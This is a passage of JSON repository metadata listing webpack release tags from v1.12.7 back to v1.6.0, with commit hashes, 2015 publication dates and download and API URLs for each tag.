cies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifes